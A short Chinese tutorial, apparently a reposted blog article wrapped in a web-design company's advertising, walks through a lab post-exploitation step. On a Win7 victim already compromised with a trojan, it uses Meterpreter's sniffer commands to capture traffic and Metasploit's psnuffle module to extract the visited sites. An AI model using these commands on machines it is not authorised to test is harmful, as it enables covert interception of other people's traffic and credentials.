今天就跟大家聊聊有关大数据中如何捕获内网数据包,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
专注于为中小企业提供成都网站设计、成都做网站、外贸网站建设服务,电脑端+手机端+微信端的三站合一,更高效的管理,为中小企业定州免费做网站提供优质的服务。我们立足成都,凝聚了一批互联网行业人才,有力地推动了千余家企业的稳健成长,帮助中小企业通过网站建设实现规模扩充和转变。
环境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.137
一、生成木马及监听主机参考上篇文章:
内网渗透 -- 提升权限(利用提权漏洞)
二、捕获数据包
1、加载sniffer:load sniffer
2、查看网卡信息:sniffer_interfaces
3、开启网卡监听,内容会自动保存到缓存中:sniffer_start 2
4、进入小受,然后随便访问几个网站
4、将捕获到数据保存下来,默认保存地址/root
sniffer_dump 2 aiyou.cap
5、启动wireshark,打开保存下来的文件
三、通过解包模块解包
1、选择解包模块
use auxiliary/sniffer/psnuffle
2、查看需要设置的参数
show options
3、设置解包文件路径
set pcapfile /root/2.cap
4、运行,run,可以查看到我们刚才访问的地址
看完上述内容,你们对大数据中如何捕获内网数据包有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注创新互联行业资讯频道,感谢大家的支持。